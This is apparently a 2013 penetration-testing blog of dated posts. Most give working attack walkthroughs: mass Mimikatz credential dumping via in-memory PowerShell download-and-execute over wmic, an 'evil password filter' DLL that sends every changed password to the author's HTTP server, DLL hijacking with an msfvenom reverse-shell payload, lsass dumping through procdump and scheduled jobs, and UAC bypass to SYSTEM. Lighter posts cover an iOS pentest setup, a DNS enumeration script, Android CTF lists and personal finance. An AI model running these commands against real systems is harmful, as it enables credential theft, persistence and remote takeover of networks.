Saturday, December 28, 2013

Creating a iOS7 Application Pentesting Environment

Now that you have your shiny new Evasion7 jailbreak running it's time to set up the environment for application testing!

Getting in

(cross-posted with permission from CG from my work blog)

Since mobile substrate is not working yet we will focus on getting our idevice up and running as a functioning *nix environment and install some tools that don't require substrate.

First we need to get into our iDevices shell prompt. We will browse Cydia (that gets installed by default with the jailbreak) and then will install the openSSH package

Once we get openSSH installed you can SSH into your device by finding its IP address in the Settings > Wireless Networks > Advanced ">" menu. 

Now SSH into port 22  on that IP using the username "root" and the password "alpine".

Once we have shell we can use APT to install most of the other packages we need. Also change the default root password to something else so people can't mess with your phone!

Arming your iDevice with *nix tools

To have a functioning *nix environment we need to install a ton of utilities that aren't usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc...

Some of the utility packages do not verbatim tell what's inside of them; things like big boss tools and Erika utilities.

These two in specific install strings and other binutils type tools. Several of them patched or modded to work on the iOS architecture (arm).

Packages (some of these will be pre-installed with the JB):



Take this list and dump it to a file (packages.txt) and run:

apt-get  install $(<packages.txt)


In addition to utilities that help make our iDevice a functioning *nix environment there are several tools that aid in connecting, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):

Tunnel ports over USB (enable SSH without network using localhost:2222)
Library. Custom implementation of iTunes type connections, file-system access, system access.
Monitor realtime iOS file system
Audits data protection of files
Read cookies.binarycookies files
lsof ARM Binary
list of all open files and the processes that opened them
lsock ARM Binary
monitor socket connections
Disables ASLR of an application
Application Cracker compiled (remove encryption)
Application Cracker (BASH GDB Wrapper)

Next steps

This is just the basics.

Once you get all of these utilities and tools installed you're pretty much waiting on substrate to be working for iOS 7. After that's done you can install your favorite all encompassing or homegrown tool that uses substrate to do hooking such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.

Then you just have to MitM the web traffic. There are plenty of guides on that around the net. 

If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments. 


Thursday, December 26, 2013

Where has CG been?

I've been has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/

I attempted to recruit some smart people to make some posts and they did so thanks to all the guest bloggers this year.

so what's been up?

well I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmables RGB color ones. Facebook friends have been kept abreast of the situation.  Two, stock trading...which i found out a fair number of hackers are into...which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until i die. See that post for a tiny bit more explanation.

I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.

anyway. Tech stuff....whats up?

Shitty passwords are whats up this year (totally new issue right??!!!). I didn't go back and count but a large majority of the tests I performed or assisted with this year where there was some sort of single factor login portal (SSLVPN, Citrix, OWA, etc) fell over to one of the following:

Its 2013 almost 2014 as I write this, its sad that we are still dealing with this like this a new or unsolvable problem.  Just reaffirms to me that we are failing as an industry if today we can break into some organization that spends any dollars on security with Password1. Its really no mystery why bad guys are beating the piss out of people.

Earlier this year a guy that does work on things in China gave a talk and said that the Chinese culture thing about security like this: (to paraphrase):

"if an organization doesnt protect against stealing it, they must not care about it"  

Protecting your important **stuff** with Password1, or a web application where any web vulnerability scanner finds SQL... yeah its no surprise when someone steals your *whatever*.

Grumpiness aside, we did do some neat shit this year.  A pseudo highlight reel can be found in the string of talks that Chris Nickerson, Eric Smith,  and Mubix and I gave at Derbycon this year.

Lares continues to break into hard to break into places using Red Teaming.

I also gave a talk at a credit union conference a few months ago where i tried to sum up how organizations are getting owned. TLDR; its all stuff we know about, but it takes work to fix, so not that many organizations do it.

I've been kind of a deadbeat on talking in 2013 but i have a few ideas on some talks for 2014, ideally blog posts either here or the Lares blog will help me work those ideas into posts and eventually into a slide deck(s).


Monday, December 23, 2013

Best non-technical book I read this year

So first of a few end of year posts...

Best non-technical book i read this year was Rich Dad Poor Dad

I'd like to thank Joe McCray for recommending it to me. I wish i had read the book in my teens and/or my twenties. There are TONS of reviews on the book i'd encourage everyone remotely interested to read a mix of the 5 star and 1 star ones to get a feel.  I'll even drop the most important thing i got from the book here:

Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.

Pretty simple right?!  Unfortunately most of us (myself included) have been brought up to look at things like houses, cars, expensive things as assets because we can sell them if we need to for $$. However after being a former BMW owner and a current house owner i can attest that the mentioned items did not *make* me any money. In fact the house is a constant source of cash outflow. This is exactly what the book talks about.

Now to be fair, and if you read the reviews this will come across, there is A LOT of magic hand waving on how one starts buying assets instead of liabilities and growing wealth. The author uses real estate and mentions you can start a business or build wealth via stocks/trading as other ways to build wealth (assets). None of those in my opinion are quick, easy, or cheap to get started in and none of those come without a hefty education requirement in order not to lose your starting capital. Nevertheless, the value in the book comes from identifying the problem of how poor people view and interact with money and how rich people view and interact with money as well as giving a general road map on a new way to think about building wealth.




Friday, October 4, 2013

AD Zone Transfers as a user

The tired and true method for Zone Transfers are using either nslookup:
ls -d
Or dig:
dig -t AXFR
In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the 'dnscmd' command like so:
dnscmd /EnumZones
dnscmd /ZonePrint
Which is handy if you can pop the DNS server (usually the Domain Controller so you usually have better things to do at that point).

You can also use PowerShell:

PS C:\Users\jdoe> get-wmiobject -ComputerName dc1 -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname=''" | select textrepresentation
Again, this requires you to be a very high privileged account, which is no fun. I need these computer lists as part of my internal / post-exploitation recon, not an end step.

For the longest time I relied on a very awesome tool called "Adfind":
adfind -sc computers_active -csv -nodn -nocsvq -nocsvheader
This command will output a list of computer accounts that have been active in the last 90 days in a straight line by line format (hence all of the no "this"and no "that" flags)

But that wasn't good enough, this image kept haunting me:

It's Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory that I was able to get to as a basic domain user. This means all of the static DNS records for the unix systems and mainframes and other systems outside of the purely Windows world are there as well.

I spent 4 days attempting to write my own script, ldap query, prayer to  get all of the data out but was unsuccessful. On the 5th day I happened upon a very short post saying "I did it", as I probably would have written the same. It comes in the form of a PowerShell script that you can find here:


And is very easy to run:
PS C:\Users\jdoe> dns-dump.ps1 -zone -dc dc1

C:\> powershell -ep bypass -f dnsdump.ps1 -zone -dc dc1
If you put a -csv on the end of those the author has even given you the CSV format which makes the output extremely easy to parse. Now you can throw your list into your tool of choice instead of scanning random IP ranges on the targets network for important stuff you can scan directly against known good hosts.

-- mubix

P.S. Yes I realize this isn't actually "Zone Transfer"s but its close enough 

Dumping a domain's worth of passwords with mimikatz

clymb3r recently posted a script called "Invoke-Mimikatz.ps1" basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:
powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds"
(This works REALLY well for Citrix and Kiosk scenarios and it's too hard to type/remember)
This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system. 

One of the awesome added capabilities for this script is to run on a list of hosts. as so:
powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"
This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn't a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it "Mass Mimikatz"

Step 1. Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
We are setting "Everyone" permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the "Everyone" token so that we don't have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb
or you can just make the following changes"
HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ  = open
HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" = 1
Step 3. Change directory into new "open" directory. This is so our uploads and in particular our web server will be hosted out of the correct directory.

Step 4. Upload powershell script powermeup.cmd - this script will run our hosted Invoke-Mimikatz script on each host:
powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds > \\\open\%COMPUTERNAME%.txt 2>&1
Step 5. Upload clymb3r's Invoke-Mimikatz ps1 - Download from PowerSploit repo: source on github

Step 6. Upload mongoose: Downloads Page - Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on. You'll have to gather this one way or another.

Step 8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

Step 9a. Execute wmic:
wmic /node:@serverlist.txt process call create "\\\open\powershellme.cmd"
Step 9b. Execute wmic with creds:
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\\open\powershellme.cmd"
Step 10. Watch as text files full of wonder and joy fill your share.
Don't forget to clean up::

Step 1. kill mongoose process
Step 2. net share open /delete
Step 3. kill/reset registry values
Step 4. delete "open" directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)
psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"

I got passwords from here,here,here,here, EVERYWHERE!

Wednesday, September 11, 2013

Stealing passwords every time they change

Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows Accounts than those available by default in Active Directory Group Policy.  It is also fairly documented on how to Install and Register Password Filters [1]. Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages

with the name of a DLL (without the extension) that you place in Windows\System32\

For National CCDC earlier this year (2013), I created an installer and "evil pass filter" that basically installed itself as a password filter and any time any passwords changed it would store the change to a log file locally to the victim (in clear text) as well as issue an HTTP basic auth POST to a server I own with the username and password.

The full code can be found below. I'll leave the compiling up to you but basically its slamming the code in Visual Studio, telling it its a DLL, and clicking build for the architecture you are targeting (Make sure to use the Internet Open access settings that make the most sense for the environment you are using this in [2]).

So lets walk the exploitation:

First, you have to be admin or system, as this is more of a persistence method than anything.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Next, we upload the evilpassfilter.dll to Sytem32:
meterpreter > pwd
meterpreter > upload /tmp/evilpassfilter.dll .
[*] uploading  : /tmp/evilpassfilter.dll -> .
[*] uploaded   : /tmp/evilpassfilter.dll -> .\evilpassfilter.dll
Then we need to query what is already in the notification packages list:
meterpreter > reg queryval -k HKLM\\System\\CurrentControlSet\\Control\\Lsa -v "Notification Packages"
Key: HKLM\System\CurrentcontrolSet\Control\Lsa
Name: Notification Packages
Data: sceclirassfm
What you can't see here since Metasploit isn't showing the line breaks is that there are two there by default:
We need to add ours to the end of this list, unfortunately at the current point of time its impossible to do directly from the meterpreter command line (as far as I know). So we need to drop a .reg file and manually import it. Easiest way to do that is to add your "evilpassfilter" string as well as the ones on the victim to a VM you have and export it. Should look like this:

Once we have our file, we upload and import it using reg command:
meterpreter > upload importme.reg .
[*] uploading  : importme.reg -> .
[*] uploaded   : importme.reg -> .\importme.reg
meterpreter > execute -H -f regedit.exe -a '/s importme.reg'
Process 2628 created.
meterpreter > 
Double check our work:
meterpreter > reg queryval -k HKLM\\System\\CurrentcontrolSet\\Control\\Lsa -v "Notification Packages"
Key: HKLM\System\CurrentcontrolSet\Control\Lsa
Name: Notification Packages
Data: sceclirnrassfmrnevilpassfilter 
Its there, w00t! But it doesn't do anything until a reboot happens :(. Lets just force that to happen (not the most stealthy thing to do):
meterpreter > reboot
While thats going on, lets set up the server to catch the basic auth.

msf exploit(psexec) > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > set URIPATH /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on
[*] Using URL:
[*]  Local IP:
[*] Server started.
msf auxiliary(http_basic) > 
Then we wait for a password to be changed:
msf auxiliary(http_basic) >
[*]   http_basic - Sending 401 to client
[+] - Credential collected: "jack:ASDqwe123" => /
No matter how complex their password is and without having a shell on the box anymore:
msf auxiliary(http_basic) >
[+] - Credential collected: "jack:a?'z_a4#RRK(mvQEsyQ8l`,JR.pes<;6#0$puQ%Q&,@ZwY(T@p" => /
This works from Windows 2000, XP all the way up to Windows 8 & 2012.

Ok, but how often are local password changed? Maybe not that often, but guess what happens when a password filter is put on a domain controller. Every password changed by that DC is "verified" by your evil password filter.

Oh and what does that log file we talked about earlier on the victim look like if for some reason they block that IP you're getting your authentication to? (You would have to find a way to get back on that system, or make it available via a share or otherwise)
This attack supports a larger character set than most banks ;-)

Full code:


Tuesday, September 10, 2013

Changing proxychains' "hardcoded" DNS server

If you've ever used proxychains to push things through Meterpreter, one of the most annoying things is its "hardcoded" DNS setting for, if the org that you are going after doesn't allow this out of their network, or if you are trying to resolve an internal asset, you're SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I've finally decided to make a note of it.

There isn't much magic here other than knowing that this file exists, but /bin/proxyresolv is a bash script that calls "dig" using TCP and the DNS server specified so it goes through the proxychains. Here is what it looks like:
(on Kali linux its found here: /usr/lib/proxychains3/proxyresolv)

# This script is called by proxychains to resolve DNS names
# DNS server used to resolve names

if [ $# = 0 ] ; then
echo " usage:"
echo " proxyresolv <hostname> "

dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'

Now you could just make the dig request yourself through proxychains then throw whatever you originally attended directly at an IP, or you can make the DNS_SERVER change and hardcode your engagement's internal IP, up to you, but now its documented and I'll never have to go searching like crazy again... as long as I remember that its on someone else's blog.

Wednesday, September 4, 2013

Finding Executable Hijacking Opportunities


DLL Hijacking is nothing new and there are a number of ways to find the issue, but the best way I have found is a bit more forceful method using a network share. First we need a network share that we can 1. monitor every request failed or not, and 2. allow ANYONE to access that share because if there is a problem with a service that runs as SYSTEM its not going to have credentials to authenticate against a share with more constrained permissions.

Step 1: Set up Samba w/ guest access

In /etc/samba/smb.conf add these two shares. (You need to also create the directories in /tmp)
comment = Shares
browseable = yes
path = /tmp/share32
guest ok = yes
create mask = 0777
read only = no

comment = Shares
browseable = yes
path = /tmp/share64
guest ok = yes
create mask = 0777
read only = no

root@wpad:/tmp/share32/ # service samba restart
[ ok ] Stopping Samba daemons: nmbd smbd.
[ ok ] Starting Samba daemons: nmbd smbd.
Cool, we have a share. Next we need to override the PATH variable in our victim machine:

Step 2: Set PATH to share IP

The PATH environmental variable is what controls where things are "looked" for when being called if and when someone or some part of the OS attempts to run something without its full path. For example, you probably don't type C:\Windows\System32\calc.exe every time you want calc to pop up (ok, bad example since you probably just double click the shortcut, but you get the idea). Same on Linux actually as well, if someone types 'ls' the system does a quick check in all of the PATH directories for the 'ls' binary, stopping at the first instance it finds it. So below in the screen shot you can see me adding our share to the very beginning of the PATH variable using the ';' semicolon as a delimiter:

Step 3: Use wireshark (smb) mask to find STATUS_OBJECT_NAME_NOT_FOUND messages

Now we need to find a way to monitor the requests that are going to happen. I initially tried using just standard Samba logging turned all the way up to level 5. The problem was parsing and turn around. I found it easier to use wireshark

The screen shot shows how you can add the "File name" in the response and request packets to a column to make it easier to scroll through as the requests go by.

On a Windows 7 machine I have as a VM, when I reboot I get “oci.dll” as one of the DLLs that get requested:

Step 4: Generate payload

./msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=4444 > /tmp/share32/bob.dll

Step 5: Toss in the DLL with the right name.

cd /tmp/share32/
mv bob.dll oci.dll

Step 6: Get shell

System reboots..

Step 7: Next Steps

Ok, but that requires a reboot. What other hijacking can I do? Start some programs, services, open file types and just watch what is attempted to be loaded. If you see an EXE or DLL being requested to the share, rename your evil bin, and repeat whatever you did to cause the request.

This can result in persistence methods or sometimes privilege escalation, but be sure to test as much as possible, because if you override the loading of a critical DLL or executable, you may cause service disruption (anywhere from just a popup about a crash to a complete stall of the system).

Update: Eric G on Google+ mentioned that Mandiant has a post about what oci.dll is and how it was used in malware:

Wednesday, August 28, 2013

Want to break some Android apps?

1st off, Hi. I'm @jhaddix the newest guy on this blog...

Android App testing requires some diverse skills depending on what you're trying to accomplish. Some app testing is like forensics, there's a ton of server side stuff with web services, and there's also times when you need to show failings in programmatic protections or features which requires reversing, debugging, or patching skills.

To develop these skills you need some practice targets. Here's a list of all known Android security challenges, both app level vulns and crackme-type (RE/patching):

In some cases the write-up and challenge starter info is included, in other cases you might have to Google around as some of these CTF's are old.

** Should you need some help with configuring an Android pentest / Crackme environment, cktricky  and CG have already written some pieces on that: **

Hacme Bank Android - Foundstone 

ExploitMe Android - Security Compass 

InSecure Bank - Paladion 

GoatDroid - OWASP and Nvisium Security

IG Learner - Intrepidus Group 

Evil Planner Bsides Challenge and Mercury vulnerable test app - MWR Labs

Description - 
File -’s and deurus's Android Crackmes 1-4 ++ Crackmes (in Spanish so an extra challenge) 

Nuit du Hack's 2k12 & 2k11 (pre-quals and finals) Android Crackme’s 

Hack.Lu's CTF 2011 Reverse Engineering 300's Crackme’s 

BlueBox Android Challenge

Description - 
Partial Walkthrough - 

CSAW2011 CTF Android Challenges
Android 1 file -
Android 2 file -

Defcon 19 Quals b300 dex challenge

GreHack 2012 CTF Reverse Engineering 100

Nullcon HackIM CTF 2012 RE 300

C0C0N CTF 2011 RE level 100

Atast CTF 2012 Bin 300

SecuInside 2011 CTF Level 7 (level 3 is also android but i am unable to find the bin)
Witeup -
File -

Happy hacking! Don't hesitate to leave a comment on any other Android challenges you find =)

Wednesday, July 31, 2013

Mimikatz Minidump and mimikatz via bat file

I tweeted about this blog post a few weeks ago and got to use it on a PT, so its no secret...

also mubix beat me to this post, but i'm posting it here for my notes keeping purposes

First, check out this post by the mimikatz author.  Now, one of the twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately i'm rarely sitting with a GUI and can just "right click" but i do usually have the ability to "net use" and create scheduled tasks.  The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.

So quickly how I've been doing it.

Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat

contents of procdump.bat

@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1

then just create an "at" job to run it for you

at \\ 20:55 C:\windows\temp\procdump.bat

From there you'll have a dump file, copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file:  from the mimikatz blog post:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump

mimikatz # sekurlsa::logonPasswords

Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
         * Username:
         * Domain: MicrosoftAccount
         * LM: d0e9aee149655a6075e4540af1f22d3b
         * NTLM: cc36cf7a8514893efccd332446158b1a
         * Username:
         * Domain: MicrosoftAccount
         * Password: waza1234 /
         * Username:
         * Domain: MicrosoftAccount
         * Password: waza1234 /
         * Username:
         * Domain: ps: password
         * Password: waza1234 /

Why not just push up mimikatz?  Well, mimikatz you download is now tagged by AV, so you can compile you own and get around that, white listing tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell,  but mostly this method make it so you don't need a meterpreter sessions or other type of interactive shell on the remote host. run bat file, get your dump file, and get creds offline.


if for some reason you want to run mimikatz via a bat file you can use the following commands

type schtask.bat

C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt

then you can run it with an at job.


Monday, July 29, 2013

admin to SYSTEM win7 with remote.exe

So i ran across this little gem from 2008!

I ended up using Method 2 on a recent test. The post above calls for needing an elevated command shell so you can call "at".  This is easy if you are legitimately sitting in front of the box but if you pentesting, potentially harder.

Three scenarios:

  • user is regular user and cant UAC to let you run admin commands
  • user is local admin and UAC disabled.
  • user is local admin buy you have to bypass UAC

easiest way sitting on a command shell is probably just to type "at"\

ohh man, denied :-(


Scenario 1, your screwed, gonna have to solve the not admin problem first.


Scenario 2, no UAC...just follow the linked blog post. Get a copy of remote.exe either x86 or x64 whatever architecture the system you want to run it on is and do the following command:

AT #TIME_TO_RUN c:\pathto\remote.exe /s cmd SYSCMD

once it runs, connect to the debugger you started (with SYSTEM privs)


you should see something like this:

C:\pathto\>remotex64.exe /c WPAD SYSCMD
***********     REMOTE    ************
***********     CLIENT    ************

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

**Remote: Connected to WPAD CG [Fri 4:23 PM]

nt authority\system


Scenario 3, you can use bypassuac to get around our UAC issues.

get bypassuac on your system, then run it like so

Access is denied.

Too few arguments
Incorrect input. Please find samples below.
Note, 'elevate stuff' will be executed in the elevated shell as 'cmd.exe stuff'

        elevate /c
        elevate /c [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c [arg1] [arg2] .. [argn]
        elevate /c c:\path\foo.exe [arg1] [arg2] .. [argn]
        elevate --pid 1234 /c c:\path\foo.exe [arg1] [arg2] .. [argn]

C:\pathto\>bypassuac.exe /c at 16:32 C:\pathtop\remotex64.exe /s cmd SYSCMD
Added a new job with job ID = 31

Access is denied.

dont worry,  it worked :-)

C:\pathto\>remotex64.exe /c WPAD SYSCMD
***********     REMOTE    ************
***********     CLIENT    ************

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

**Remote: Connected to WPAD CG [Fri 4:32 PM]

nt authority\system